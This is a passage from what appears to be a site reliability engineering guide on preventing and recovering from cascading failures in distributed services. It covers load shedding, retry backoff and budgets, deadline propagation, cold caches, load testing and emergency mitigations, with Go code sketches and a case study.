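		defer atomic.AddInt64(&inflight, -1)
		next.ServeHTTP(w, r)
	})
}

func main() {
	work := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.Write([]byte("ok")) // stand-in for real request handling
	})
	http.ListenAndServe(":8080", withLoadShedding(work))
}
```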
Changing the queuing method from the standard *first-in, first-out* (FIFO) to *last-in, first-out* (LIFO) or using the *controlled delay* (CoDel) algorithm [Nic12] or similar approaches can reduce load by removing requests that are unlikely to be worth processing [Mau15]. If a user’s web search is slow because an RPC has been queued for 10 seconds, there’s a good chance the user has given up and refreshed their browser, issuing another request: there’s no point in responding to the first one, since it will be ignored! This strategy works well when combined with propagating RPC deadlines throughout the stack, described in Latency and Deadlines.
More sophisticated approaches include identifying clients to be more selective about what work is dropped, or picking requests that are more important and prioritizing. Such strategies are more likely to be needed for shared services.
*Graceful degradation* takes the concept of load shedding one step further by reducing the amount of work that needs to be performed. In some applications, it’s possible to significantly decrease the amount of work or time needed by decreasing the quality of responses. For instance, a search application might only search a subset of data stored in an in-memory cache rather than the full on-disk database or use a less-accurate (but faster) ranking algorithm when overloaded.
When evaluating load shedding or graceful degradation options for your service, consider the following:
- Which metrics should you use to determine when load shedding or graceful degradation should kick in (e.g., CPU usage, latency, queue length, number of threads used, whether your service enters degraded mode automatically or if manual intervention is necessary)?
- What actions should be taken when the server is in degraded mode?
- At what layer should load shedding and graceful degradation be implemented? Does it make sense to implement these strategies at every layer in the stack, or is it sufficient to have a high-level choke-point?
As you evaluate options and deploy, keep the following in mind:
- Graceful degradation shouldn’t trigger very often—usually in cases of a capacity planning failure or unexpected load shift. Keep the system simple and understandable, particularly if it isn’t used often.
- Remember that the code path you never use is the code path that (often) doesn’t work. In steady-state operation, graceful degradation mode won’t be used, implying that you’ll have much less operational experience with this mode and any of its quirks, which *increases* the level of risk. You can make sure that graceful degradation stays working by regularly running a small subset of servers near overload in order to exercise this code path.
- Monitor and alert when too many servers enter these modes.
- Complex load shedding and graceful degradation can cause problems themselves—excessive complexity may cause the server to trip into a degraded mode when it is not desired, or enter feedback cycles at undesired times. Design a way to quickly turn off complex graceful degradation or tune parameters if needed. Storing this configuration in a consistent system that each server can watch for changes, such as Chubby, can increase deployment speed, but also introduces its own risks of synchronized failure.
## Retries
Suppose the code in the frontend that talks to the backend implements retries naively. It retries after encountering a failure and caps the number of backend RPCs per logical request to 10. Consider this code in the frontend, using gRPC in Go:
```
func exampleRpcCall(client pb.ExampleClient, request pb.Request) *pb.Response {
    // Set RPC timeout to 5 seconds.
    opts := grpc.WithTimeout(5 * time.Second)

    // Try up to 10 times to make the RPC call.
    attempts := 10
    for attempts > 0 {
        conn, err := grpc.Dial(*serverAddr, opts)
        if err != nil {
            // Something went wrong in setting up the connection. Try again.
            attempts--
            continue
        }
        defer conn.Close()

        // Create a client stub and make the RPC call.
        client := pb.NewBackendClient(conn)
        response, err := client.MakeRequest(context.Background(), request)
        if err != nil {
            // Something went wrong in making the call. Try again.
            attempts--
            continue
        }

        return response
    }

    grpclog.Fatalf("ran out of attempts")
    return nil // unreachable: Fatalf exits the process
}
```
This system can cascade in the following way:
- Assume our backend has a known limit of 10,000 QPS per task, after which point all further requests are rejected in an attempt at graceful degradation.
- The frontend calls `MakeRequest` at a constant rate of 10,100 QPS and overloads the backend by 100 QPS, which the backend rejects.
- Those 100 failed QPS are retried in `MakeRequest` every 1,000 ms, and probably succeed. But the retries are themselves adding to the requests sent to the backend, which now receives 10,200 QPS—200 QPS of which are failing due to overload.
- The volume of retries grows: 100 QPS of retries in the first second leads to 200 QPS, then to 300 QPS, and so on. Fewer and fewer requests are able to succeed on their first attempt, so less useful work is being performed as a fraction of requests to the backend.
- If the backend task is unable to handle the increase in load—which is consuming file descriptors, memory, and CPU time on the backend—it can melt down and crash under the sheer load of requests and retries. This crash then redistributes the requests it was receiving across the remaining backend tasks, in turn further overloading those tasks.
Some simplifying assumptions were made here to illustrate this scenario,110 but the point remains that retries can destabilize a system. Note that both temporary load spikes and slow increases in usage can cause this effect.
Even if the rate of calls to `MakeRequest`
decreases to pre-meltdown levels (9,000 QPS, for example), depending on how much returning a failure costs the backend, the problem might not go away. Two factors are at play here:
- If the backend spends a significant amount of resources processing requests that will ultimately fail due to overload, then the retries themselves may be keeping the backend in an overloaded mode.
- The backend servers themselves may not be stable. Retries can amplify the effects seen in Server Overload.
If either of these conditions is true, in order to dig out of this outage, you must dramatically reduce or eliminate the load on the frontends until the retries stop and the backends stabilize.
This pattern has contributed to several cascading failures, whether the frontends and backends communicate via RPC messages, the “frontend” is client JavaScript code issuing `XmlHttpRequest`
calls to an endpoint and retries on failure, or the retries originate from an offline sync protocol that retries aggressively when it encounters a failure.
When issuing automatic retries, keep in mind the following considerations:
- Most of the backend protection strategies described in Preventing Server Overload apply. In particular, testing the system can highlight problems, and graceful degradation can reduce the effect of the retries on the backend.
- Always use randomized exponential backoff when scheduling retries. See also "Exponential Backoff and Jitter" in the AWS Architecture Blog [Bro15]. If retries aren’t randomly distributed over the retry window, a small perturbation (e.g., a network blip) can cause retry ripples to schedule at the same time, which can then amplify themselves [Flo94].
- Limit retries per request. Don’t retry a given request indefinitely.
- Consider having a server-wide retry budget. For example, only allow 60 retries per minute in a process, and if the retry budget is exceeded, don’t retry; just fail the request. This strategy can contain the retry effect and be the difference between a capacity planning failure that leads to some dropped queries and a global cascading failure. (A sketch combining a retry budget with randomized exponential backoff follows this list.)
- Think about the service holistically and decide if you really need to perform retries at a given level. In particular, avoid amplifying retries by issuing retries at multiple levels: a single request at the highest layer may produce a number of attempts as large as the *product* of the number of attempts at each layer to the lowest layer. If the database can’t service requests because it’s overloaded, and the backend, frontend, and JavaScript layers all issue 3 retries (4 attempts), then a single user action may create 64 attempts (4^3) on the database. This behavior is undesirable when the database is returning those errors because it’s overloaded.
- Use clear response codes and consider how different failure modes should be handled. For example, separate retriable and nonretriable error conditions. Don’t retry permanent errors or malformed requests in a client, because neither will ever succeed. Return a specific status when overloaded so that clients and other layers back off and do not retry.
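Here is a minimal sketch that combines several of these points (all names and numbers are illustrative assumptions, not from the text): a per-request attempt cap, randomized (“full jitter”) exponential backoff, a process-wide retry budget, and no retries at all when the backend signals that it is overloaded.

```
package main

import (
	"context"
	"errors"
	"fmt"
	"math/rand"
	"sync/atomic"
	"time"
)

var retryBudget int64 = 60 // retries this process may still issue; refill logic omitted

var errOverloaded = errors.New("backend overloaded")

func callWithRetries(ctx context.Context, do func(context.Context) error) error {
	const maxAttempts = 3             // limit retries per request
	backoff := 100 * time.Millisecond // initial backoff window

	var err error
	for attempt := 1; attempt <= maxAttempts; attempt++ {
		if err = do(ctx); err == nil {
			return nil
		}
		// Don't retry when the server says it is overloaded (or, more
		// generally, when the error can never succeed on retry).
		if errors.Is(err, errOverloaded) || attempt == maxAttempts {
			return err
		}
		// Respect the process-wide retry budget: once it is spent, fail the
		// request instead of adding more load to a struggling backend.
		if atomic.AddInt64(&retryBudget, -1) < 0 {
			return err
		}
		// Sleep a random duration in [0, backoff) ("full jitter"), then
		// double the backoff window for the next attempt.
		time.Sleep(time.Duration(rand.Int63n(int64(backoff))))
		backoff *= 2
	}
	return err
}

func main() {
	err := callWithRetries(context.Background(), func(ctx context.Context) error {
		return errors.New("transient failure") // stand-in for a real RPC
	})
	fmt.Println(err)
}
```

A real implementation would also refill the budget over time and distinguish retriable from nonretriable response codes.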
In an emergency, it may not be obvious that an outage is due to bad retry behavior. Graphs of retry rates can be an indication of bad retry behavior, but may be confused as a symptom instead of a compounding cause. In terms of mitigation, this is a special case of the insufficient capacity problem, with the additional caveat that you must either fix the retry behavior (usually requiring a code push), reduce load significantly, or cut requests off entirely.
## Latency and Deadlines
When a frontend sends an RPC to a backend server, the frontend consumes resources waiting for a reply. RPC deadlines define how long a request can wait before the frontend gives up, limiting the time that the backend may consume the frontend’s resources.
### Picking a deadline
It’s usually wise to set a deadline. Setting either no deadline or an extremely high deadline may cause short-term problems that have long since passed to continue to consume server resources until the server restarts.
High deadlines can result in resource consumption in higher levels of the stack when lower levels of the stack are having problems. Short deadlines can cause some more expensive requests to fail consistently. Balancing these constraints to pick a good deadline can be something of an art.
### Missing deadlines
A common theme in many cascading outages is that servers spend resources handling requests that will exceed their deadlines on the client. As a result, resources are spent while no progress is made: you don’t get credit for late assignments with RPCs.
Suppose an RPC has a 10-second deadline, as set by the client. The server is very overloaded, and as a result, it takes 11 seconds to move from a queue to a thread pool. At this point, the client has already given up on the request. Under most circumstances, it would be unwise for the server to attempt to handle this request, because it would be doing work for which no credit will be granted—the client doesn’t care what work the server does after the deadline has passed, because it’s given up on the request already.
If handling a request is performed over multiple stages (e.g., there are a few callbacks and RPC calls), the server should check the deadline left at each stage before attempting to perform any more work on the request. For example, if a request is split into parsing, backend request, and processing stages, it may make sense to check that there is enough time left to handle the request before each stage.
### Deadline propagation
Rather than inventing a deadline when sending RPCs to backends, servers should employ deadline propagation.
With deadline propagation, a deadline is set high in the stack (e.g., in the frontend). The tree of RPCs emanating from an initial request will all have the same absolute deadline. For example, if server *A* selects a 30-second deadline, and processes the request for 7 seconds before sending an RPC to server *B*, the RPC from *A* to *B* will have a 23-second deadline. If server *B* takes 4 seconds to handle the request and sends an RPC to server *C*, the RPC from *B* to *C* will have a 19-second deadline, and so on. Ideally, each server in the request tree implements deadline propagation.
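In Go, for instance, propagating the caller’s `context.Context` gives this behavior almost for free. The sketch below is illustrative only (the serverA/serverB/serverC names and the 1-second threshold are assumptions, not from the text); it mirrors the 30-second example above and also checks the remaining deadline before starting the next stage, as recommended earlier.

```
package main

import (
	"context"
	"errors"
	"fmt"
	"time"
)

// serverA sets the only deadline, at the top of the stack; everything below
// inherits the same absolute deadline through the shared context.
func serverA(ctx context.Context) error {
	ctx, cancel := context.WithTimeout(ctx, 30*time.Second)
	defer cancel()

	time.Sleep(7 * time.Second) // local processing before calling the next layer
	return serverB(ctx)         // serverB sees the remaining ~23 seconds
}

// serverB checks how much of the deadline remains before doing more work,
// instead of inventing its own deadline for the call to serverC.
func serverB(ctx context.Context) error {
	if deadline, ok := ctx.Deadline(); ok && time.Until(deadline) < time.Second {
		return errors.New("not enough time left; giving up early")
	}
	return serverC(ctx)
}

// serverC does (simulated) work but abandons it as soon as the propagated
// deadline expires or the request is cancelled upstream.
func serverC(ctx context.Context) error {
	select {
	case <-time.After(2 * time.Second):
		return nil
	case <-ctx.Done():
		return ctx.Err()
	}
}

func main() {
	fmt.Println(serverA(context.Background()))
}
```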
Without deadline propagation, the following scenario may occur:
- Server *A* sends an RPC to server *B* with a 10-second deadline.
- Server *B* takes 8 seconds to start processing the request and then sends an RPC to server *C*.
- If server *B* uses deadline propagation, it should set a 2-second deadline, but suppose it instead uses a hardcoded 20-second deadline for the RPC to server *C*.
- Server *C* pulls the request off its queue after 5 seconds.
Had server *B* used deadline propagation, server *C* could immediately give up on the request because the 2-second deadline was exceeded. However, in this scenario, server *C* processes the request thinking it has 15 seconds to spare, but is not doing useful work, since the request from server *A* to server *B* has already exceeded its deadline.
You may want to reduce the outgoing deadline a bit (e.g., a few hundred milliseconds) to account for network transit times and post-processing in the client.
Also consider setting an upper bound for outgoing deadlines. You may want to limit how long the server waits for outgoing RPCs to noncritical backends, or for RPCs to backends that typically complete in a short duration. However, be sure to understand your traffic mix, because you might otherwise inadvertently make particular types of requests fail all the time (e.g., requests with large payloads, or requests that require responding to a lot of computation).
There are some exceptions for which servers may wish to continue processing a request after the deadline has elapsed. For example, if a server receives a request that involves performing some expensive catchup operation and periodically checkpoints the progress of the catchup, it would be a good idea to check the deadline only after writing the checkpoint, instead of after the expensive operation.
### Cancellation propagation
Propagating cancellations reduces unneeded or doomed work by advising servers in an RPC call stack that their efforts are no longer necessary. To reduce latency, some systems use "hedged requests" [Dea13] to send RPCs to a primary server, then some time later, send the same request to other instances of the same service in case the primary is slow in responding; once the client has received a response from any server, it sends messages to the other servers to cancel the now-superfluous requests. Those requests may themselves transitively fan out to many other servers, so cancellations should be propagated throughout the entire stack.
This approach can also be used to avoid the potential leakage that occurs if an initial RPC has a long deadline, but subsequent critical RPCs between deeper layers of the stack receive errors which can't succeed on retry, or have short deadlines and time out. Using only simple deadline propagation, the initial call continues to use server resources until it eventually times out, despite being doomed to failure. Sending fatal errors or timeouts up the stack and cancelling other RPCs in the call tree prevents unneeded work if the request as a whole can't be fulfilled.
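As a rough sketch of that pattern (the replica names, the simulated latencies, and the 100 ms hedge delay are all assumptions, not from the text): the first response wins, and cancelling the shared context tells the slower replica, and anything downstream of it, to stop working on a request whose result will be discarded.

```
package main

import (
	"context"
	"fmt"
	"math/rand"
	"time"
)

// callBackend simulates an RPC to one replica; it gives up as soon as the
// shared context is cancelled, which is how cancellation propagates downward.
func callBackend(ctx context.Context, replica string) (string, error) {
	latency := time.Duration(rand.Intn(300)) * time.Millisecond
	select {
	case <-time.After(latency):
		return "response from " + replica, nil
	case <-ctx.Done():
		return "", ctx.Err()
	}
}

// hedgedCall asks the primary first, involves the secondary only if the
// primary is slow, and cancels whichever request is still outstanding once
// any response has been received.
func hedgedCall(ctx context.Context) (string, error) {
	ctx, cancel := context.WithCancel(ctx)
	defer cancel() // cancels the now-superfluous request on return

	results := make(chan string, 2)
	errs := make(chan error, 2)
	launch := func(replica string) {
		if resp, err := callBackend(ctx, replica); err == nil {
			results <- resp
		} else {
			errs <- err
		}
	}

	go launch("primary")
	hedge := time.After(100 * time.Millisecond) // hedge delay

	errCount := 0
	for {
		select {
		case resp := <-results:
			return resp, nil
		case <-hedge:
			hedge = nil // fire the hedge at most once
			go launch("secondary")
		case err := <-errs:
			errCount++
			if errCount == 2 {
				return "", err
			}
		}
	}
}

func main() {
	fmt.Println(hedgedCall(context.Background()))
}
```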
### Bimodal latency
Suppose that the frontend from the preceding example consists of 10 servers, each with 100 worker threads. This means that the frontend has a total of 1,000 threads of capacity. During usual operation, the frontends perform 1,000 QPS and requests complete in 100 ms. This means that the frontends usually have 100 worker threads occupied out of the 1,000 configured worker threads (1,000 QPS * 0.1 seconds).
Suppose an event causes 5% of the requests to never complete. This could be the result of the unavailability of some Bigtable row ranges, which renders the requests corresponding to that Bigtable keyspace unservable. As a result, 5% of the requests hit the deadline, while the remaining 95% of the requests take the usual 100 ms.
With a 100-second deadline, 5% of requests would consume 5,000 threads (50 QPS * 100 seconds), but the frontend doesn’t have that many threads available. Assuming no other secondary effects, the frontend will only be able to handle 19.6% of the requests (1,000 threads available / (5,000 + 95) threads’ worth of work), resulting in an 80.4% error rate.
Therefore, instead of only 5% of requests receiving an error (those that didn’t complete due to keyspace unavailability), most requests receive an error.
The following guidelines can help address this class of problems:
- Detecting this problem can be very hard. In particular, it may not be clear that bimodal latency is the cause of an outage when you are looking at *mean* latency. When you see a latency increase, try to look at the *distribution* of latencies in addition to the averages.
- This problem can be avoided if the requests that don’t complete return with an error early, rather than waiting the full deadline. For example, if a backend is unavailable, it’s usually best to immediately return an error for that backend, rather than consuming resources until the backend is available. If your RPC layer supports a fail-fast option, use it.
- Having deadlines several orders of magnitude longer than the mean request latency is usually bad. In the preceding example, a small number of requests initially hit the deadline, but the deadline was three orders of magnitude larger than the normal mean latency, leading to thread exhaustion.
- When using shared resources that can be exhausted by some keyspace, consider either limiting in-flight requests by that keyspace or using other kinds of abuse tracking. Suppose your backend processes requests for different clients that have wildly different performance and request characteristics. You might consider only allowing 25% of your threads to be occupied by any one client in order to provide fairness in the face of heavy load by any single client misbehaving.
# Slow Startup and Cold Caching
Processes are often slower at responding to requests immediately after starting than they will be in steady state. This slowness can be caused by either or both of the following:
- Required initialization: setting up connections upon receiving the first request that needs a given backend
- Runtime performance improvements in some languages, particularly Java: Just-In-Time compilation, hotspot optimization, and deferred class loading
Similarly, some binaries are less efficient when caches aren’t filled. For example, in the case of some of Google’s services, most requests are served out of caches, so requests that miss the cache are significantly more expensive. In steady-state operation with a warm cache, only a few cache misses occur, but when the cache is completely empty, 100% of requests are costly. Other services might employ caches to keep a user’s state in RAM. This might be accomplished through hard or soft stickiness between reverse proxies and service frontends.
If the service is not provisioned to handle requests under a cold cache, it’s at greater risk of outages and should take steps to avoid them.
The following scenarios can lead to a cold cache:
- Turning up a new cluster: a recently added cluster will have an empty cache.
- Returning a cluster to service after maintenance: the cache may be stale.
- Restarts: if a task with a cache has recently restarted, filling its cache will take some time. It may be worthwhile to move caching from a server to a separate binary like memcache, which also allows cache sharing between many servers, albeit at the cost of introducing another RPC and slight additional latency.
If caching has a significant effect on the service,111 you may want to use one or some of the following strategies:
- Overprovision the service. It’s important to note the distinction between a latency cache versus a capacity cache: when a latency cache is employed, the service can sustain its expected load with an empty cache, but a service using a capacity cache cannot sustain its expected load under an empty cache. Service owners should be vigilant about adding caches to their service, and make sure that any new caches are either latency caches or are sufficiently well engineered to safely function as capacity caches. Sometimes caches are added to a service to improve performance, but actually wind up being hard dependencies.
- Employ general cascading failure prevention techniques. In particular, servers should reject requests when they’re overloaded or enter degraded modes, and testing should be performed to see how the service behaves after events such as a large restart.
- When adding load to a cluster, slowly increase the load. The initially small request rate warms up the cache; once the cache is warm, more traffic can be added. It’s a good idea to ensure that all clusters carry nominal load and that the caches are kept warm.
## Always Go Downward in the Stack
In the example Shakespeare service, the frontend talks to a backend, which in turn talks to the storage layer. A problem that manifests in the storage layer can cause problems for servers that talk to it, but fixing the storage layer will usually repair both the backend and frontend layers.
However, suppose the backends cross-communicate amongst each other. For example, the backends might proxy requests to one another to change who owns a user when the storage layer can’t service a request. This intra-layer communication can be problematic for several reasons:
- The communication is susceptible to a distributed deadlock. Backends may use the same thread pool to wait on RPCs sent to remote backends that are simultaneously receiving requests from remote backends. Suppose backend *A*’s thread pool is full. Backend *B* sends a request to backend *A* and uses a thread in backend *B* until backend *A*’s thread pool clears. This behavior can cause the thread pool saturation to spread.
- If intra-layer communication increases in response to some kind of failure or heavy load condition (e.g., load rebalancing that is more active under high load), intra-layer communication can quickly switch from a low to high intra-layer request mode when the load increases enough. For example, suppose a user has a primary backend and a predetermined hot standby secondary backend in a different cluster that can take over the user. The primary backend proxies requests to the secondary backend as a result of errors from the lower layer or in response to heavy load on the primary. If the entire system is overloaded, primary-to-secondary proxying will likely increase and add even more load to the system, due to the additional cost of parsing and waiting on the request to the secondary in the primary.
- Depending on the criticality of the cross-layer communication, bootstrapping the system may become more complex.
It’s usually better to avoid intra-layer communication—i.e., possible cycles in the communication path—in the user request path. Instead, have the client do the communication. For example, if a frontend talks to a backend but guesses the wrong backend, the backend should not proxy to the correct backend. Instead, the backend should tell the frontend to retry its request on the correct backend.
# Triggering Conditions for Cascading Failures
When a service is susceptible to cascading failures, there are several possible disturbances that can initiate the domino effect. This section identifies some of the factors that trigger cascading failures.
## Process Death
Some server tasks may die, reducing the amount of available capacity. Tasks might die because of a Query of Death (an RPC whose contents trigger a failure in the process), cluster issues, assertion failures, or a number of other reasons. A very small event (e.g., a couple of crashes or tasks rescheduled to other machines) may cause a service on the brink of falling to break.
## Process Updates
Pushing a new version of the binary or updating its configuration may initiate a cascading failure if a large number of tasks are affected simultaneously. To prevent this scenario, either account for necessary capacity overhead when setting up the service’s update infrastructure, or push off-peak. Dynamically adjusting the number of in-flight task updates based on the volume of requests and available capacity may be a workable approach.
## New Rollouts
A new binary, configuration changes, or a change to the underlying infrastructure stack can result in changes to request profiles, resource usage and limits, backends, or a number of other system components that can trigger a cascading failure.
During a cascading failure, it’s usually wise to check for recent changes and consider reverting them, particularly if those changes affected capacity or altered the request profile.
Your service should implement some type of change logging, which can help quickly identify recent changes.
## Organic Growth
In many cases, a cascading failure isn’t triggered by a specific service change, but because a growth in usage wasn’t accompanied by an adjustment to capacity.
## Planned Changes, Drains, or Turndowns
If your service is multihomed, some of your capacity may be unavailable because of maintenance or outages in a cluster. Similarly, one of the service’s critical dependencies may be drained, resulting in a reduction in capacity for the upstream service due to drain dependencies, or an increase in latency due to having to send the requests to a more distant cluster.
### Request profile changes
A backend service may receive requests from different clusters because a frontend service shifted its traffic due to load balancing configuration changes, changes in the traffic mix, or cluster fullness. Also, the average cost to handle an individual payload may have changed due to frontend code or configuration changes. Similarly, the data handled by the service may have changed organically due to increased or differing usage by existing users: for instance, both the number and size of images, *per user*, for a photo storage service tend to increase over time.
### Resource limits
Some cluster operating systems allow resource overcommitment. CPU is a fungible resource; often, some machines have some amount of slack CPU available, which provides a bit of a safety net against CPU spikes. The availability of this slack CPU differs between cells, and also between machines within the cell.
Depending upon this slack CPU as your safety net is dangerous. Its availability is entirely dependent on the behavior of the other jobs in the cluster, so it might suddenly drop out at any time. For example, if a team starts a MapReduce that consumes a lot of CPU and schedules on many machines, the aggregate amount of slack CPU can suddenly decrease and trigger CPU starvation conditions for unrelated jobs. When performing load tests, make sure that you remain within your committed resource limits.
# Testing for Cascading Failures
The specific ways in which a service will fail can be very hard to predict from first principles. This section discusses testing strategies that can detect if services are susceptible to cascading failures.
You should test your service to determine how it behaves under heavy load in order to gain confidence that it won’t enter a cascading failure under various circumstances.
## Test Until Failure and Beyond
Understanding the behavior of the service under heavy load is perhaps the most important first step in avoiding cascading failures. Knowing how your system behaves when it is overloaded helps to identify what engineering tasks are the most important for long-term fixes; at the very least, this knowledge may help bootstrap the debugging process for on-call engineers when an emergency arises.
Load test components until they break. As load increases, a component typically handles requests successfully until it reaches a point at which it can’t handle more requests. At this point, the component should ideally start serving errors or degraded results in response to additional load, but not significantly reduce the rate at which it successfully handles requests. A component that is highly susceptible to a cascading failure will start crashing or serving a very high rate of errors when it becomes overloaded; a better designed component will instead be able to reject a few requests and survive.
Load testing also reveals where the breaking point is, knowledge that’s fundamental to the capacity planning process. It enables you to test for regressions, provision for worst-case thresholds, and to trade off utilization versus safety margins.
Because of caching effects, gradually ramping up load may yield different results than immediately increasing to expected load levels. Therefore, consider testing both gradual and impulse load patterns.
You should also test and understand how the component behaves as it returns to nominal load after having been pushed well beyond that load. Such testing may answer questions such as:
- If a component enters a degraded mode on heavy load, is it capable of exiting the degraded mode without human intervention?
- If a couple of servers crash under heavy load, how much does the load need to drop in order for the system to stabilize?
If you’re load testing a stateful service or a service that employs caching, your load test should track state between multiple interactions and check correctness at high load, which is often where subtle concurrency bugs hit.
Keep in mind that individual components may have different breaking points, so load test each component separately. You won’t know in advance which component may hit the wall first, and you want to know how your system behaves when it does.
If you believe your system has proper protections against being overloaded, consider performing failure tests in a small slice of production to find the point at which the components in your system fail under real traffic. These limits may not be adequately reflected by synthetic load test traffic, so real traffic tests may provide more realistic results than load tests, at the risk of causing user-visible pain. Be careful when testing on real traffic: make sure that you have extra capacity available in case your automatic protections don’t work and you need to manually fail over. You might consider some of the following production tests:
- Reducing task counts quickly or slowly over time, beyond expected traffic patterns
- Rapidly losing a cluster’s worth of capacity
- Blackholing various backends
## Test Popular Clients
Understand how large clients use your service. For example, you want to know if clients:
- Can queue work while the service is down
- Use randomized exponential backoff on errors
- Are vulnerable to external triggers that can create large amounts of load (e.g., an externally triggered software update might clear an offline client’s cache)
Depending on your service, you may or may not be in control of all the client code that talks to your service. However, it’s still a good idea to have an understanding of how large clients that interact with your service will behave.
The same principles apply to large internal clients. Stage system failures with the largest clients to see how they react. Ask internal clients how they access your service and what mechanisms they use to handle backend failure.
## Test Noncritical Backends
Test your noncritical backends, and make sure their unavailability does not interfere with the critical components of your service.
For example, suppose your frontend has critical and noncritical backends. Often, a given request includes both critical components (e.g., query results) and noncritical components (e.g., spelling suggestions). Your requests may significantly slow down and consume resources waiting for noncritical backends to finish.
In addition to testing behavior when the noncritical backend is unavailable, test how the frontend behaves if the noncritical backend never responds (for example, if it is blackholing requests). Backends advertised as noncritical can still cause problems on frontends when requests have long deadlines. The frontend should not start rejecting lots of requests, running out of resources, or serving with very high latency when a noncritical backend blackholes.
# Immediate Steps to Address Cascading Failures
Once you have identified that your service is experiencing a cascading failure, you can use a few different strategies to remedy the situation—and of course, a cascading failure is a good opportunity to use your incident management protocol (Managing Incidents).
## Increase Resources
If your system is running at degraded capacity and you have idle resources, adding tasks can be the most expedient way to recover from the outage. However, if the service has entered a death spiral of some sort, adding more resources may not be sufficient to recover.
## Stop Health Check Failures/Deaths
Some cluster scheduling systems, such as Borg, check the health of tasks in a job and restart tasks that are unhealthy. This practice may create a failure mode in which health-checking itself makes the service unhealthy. For example, if half the tasks aren’t able to accomplish any work because they’re starting up and the other half will soon be killed because they’re overloaded and failing health checks, temporarily disabling health checks may permit the system to stabilize until all the tasks are running.
Process health checking (“is this binary responding *at all*?”) and service health checking (“is this binary able to respond to *this class of requests* right now?”) are two conceptually distinct operations. Process health checking is relevant to the cluster scheduler, whereas service health checking is relevant to the load balancer. Clearly distinguishing between the two types of health checks can help avoid this scenario.
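One way to keep those two signals separate is to expose them as distinct endpoints. The sketch below is illustrative only (the `/alive` and `/ready` paths and the `acceptingTraffic` flag are assumptions, not from the text): the scheduler restarts the task only if the process stops answering at all, while the load balancer can stop sending traffic to a task that is temporarily overloaded or still warming up.

```
package main

import (
	"net/http"
	"sync/atomic"
)

// acceptingTraffic is flipped off while the task is overloaded or warming up.
var acceptingTraffic atomic.Bool

// processHealth is the process health check, used by the cluster scheduler to
// decide whether to restart the task. It succeeds as long as the binary can
// respond at all.
func processHealth(w http.ResponseWriter, r *http.Request) {
	w.WriteHeader(http.StatusOK)
}

// serviceHealth is the service health check, used by the load balancer to
// decide whether to send this task traffic. It can fail while the task is
// overloaded without causing the scheduler to kill the process.
func serviceHealth(w http.ResponseWriter, r *http.Request) {
	if !acceptingTraffic.Load() {
		http.Error(w, "not ready for traffic", http.StatusServiceUnavailable)
		return
	}
	w.WriteHeader(http.StatusOK)
}

func main() {
	acceptingTraffic.Store(true)
	http.HandleFunc("/alive", processHealth)
	http.HandleFunc("/ready", serviceHealth)
	http.ListenAndServe(":8080", nil)
}
```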
## Restart Servers
If servers are somehow wedged and not making progress, restarting them may help. Try restarting servers when:
- Java servers are in a GC death spiral
- Some in-flight requests have no deadlines but are consuming resources, leading them to block threads, for example
- The servers are deadlocked
Make sure that you identify the source of the cascading failure before you restart your servers. Make sure that taking this action won’t simply shift around load. Canary this change, and make it slowly. Your actions may amplify an existing cascading failure if the outage is actually due to an issue like a cold cache.
## Drop Traffic
Dropping load is a big hammer, usually reserved for situations in which you have a true cascading failure on your hands and you cannot fix it by other means. For example, if heavy load causes most servers to crash as soon as they become healthy, you can get the service up and running again by:
- Addressing the initial triggering condition (by adding capacity, for example).
- Reducing load enough so that the crashing stops. Consider being aggressive here—if the entire service is crash-looping, only allow, say, 1% of the traffic through.
- Allowing the majority of the servers to become healthy.
- Gradually ramping up the load.
This strategy allows caches to warm up, connections to be established, etc., before load returns to normal levels.
Obviously, this tactic will cause a lot of user-visible harm. Whether or not you’re able to (or if you even *should*) drop traffic indiscriminately depends on how the service is configured. If you have some mechanism to drop less important traffic (e.g., prefetching), use that mechanism first.
It is important to keep in mind that this strategy enables you to recover from a cascading outage once the underlying problem is fixed. If the issue that started the cascading failure is not fixed (e.g., insufficient global capacity), then the cascading failure may trigger shortly after all traffic returns. Therefore, before using this strategy, consider fixing (or at least papering over) the root cause or triggering condition. For example, if the service ran out of memory and is now in a death spiral, adding more memory or tasks should be your first step.
## Enter Degraded Modes
Serve degraded results by doing less work or dropping unimportant traffic. This strategy must be engineered into your service, and can be implemented only if you know which traffic can be degraded and you have the ability to differentiate between the various payloads.
## Eliminate Batch Load
Some services have load that is important, but not critical. Consider turning off those sources of load. For example, if index updates, data copies, or statistics gathering consume resources of the serving path, consider turning off those sources of load during an outage.
## Eliminate Bad Traffic
If some queries are creating heavy load or crashes (e.g., queries of death), consider blocking them or eliminating them via other means.
##### Cascading Failure and Shakespeare
A documentary about Shakespeare’s works airs in Japan, and explicitly points to our Shakespeare service as an excellent place to conduct further research. Following the broadcast, traffic to our Asian datacenter surges beyond the service’s capacity. This capacity problem is further compounded by a major update to the Shakespeare service that simultaneously occurs in that datacenter.
Fortunately, a number of safeguards are in place that help mitigate the potential for failure. The Production Readiness Review process identified some issues that the team already addressed. For example, the developers built graceful degradation into the service. As capacity becomes scarce, the service no longer returns pictures alongside text or small maps illustrating where a story takes place. And depending on its purpose, an RPC that times out is either not retried (for example, in the case of the aforementioned pictures), or is retried with a randomized exponential backoff. Despite these safeguards, the tasks fail one by one and are then restarted by Borg, which drives the number of working tasks down even more.
As a result, some graphs on the service dashboard turn an alarming shade of red and SRE is paged. In response, SREs temporarily add capacity to the Asian datacenter by increasing the number of tasks available for the Shakespeare job. By doing so, they’re able to restore the Shakespeare service in the Asian cluster.
Afterward, the SRE team writes a postmortem detailing the chain of events, what went well, what could have gone better, and a number of action items to prevent this scenario from occurring again. For example, in the case of a service overload, the GSLB load balancer will redirect some traffic to neighboring datacenters. Also, the SRE team turns on autoscaling so that the number of tasks automatically increases with traffic, meaning they don’t have to worry about this type of issue again.
# Closing Remarks
When systems are overloaded, something needs to give in order to remedy the situation. Once a service passes its breaking point, it is better to allow some user-visible errors or lower-quality results to slip through than try to fully serve every request. Understanding where those breaking points are and how the system behaves beyond them is critical for service owners who want to avoid cascading failures.
Without proper care, some system changes meant to reduce background errors or otherwise improve the steady state can expose the service to greater risk of a full outage. Retrying on failures, shifting load around from unhealthy servers, killing unhealthy servers, adding caches to improve performance or reduce latency: all of these might be implemented to improve the normal case, but can increase the chance of causing a large-scale failure. Be careful when evaluating changes to ensure that one outage is not being traded for another.
107See Wikipedia, “Positive feedback,” *https://en.wikipedia.org/wiki/Positive_feedback*.
108A watchdog is often implemented as a thread that wakes up periodically to see whether work has been done since the last time it checked. If not, it assumes that the server is stuck and kills it. For instance, requests of a known type can be sent to the server at regular intervals; if one hasn’t been received or processed when expected, this may indicate failure—of the server, the system sending requests, or the intermediate network.
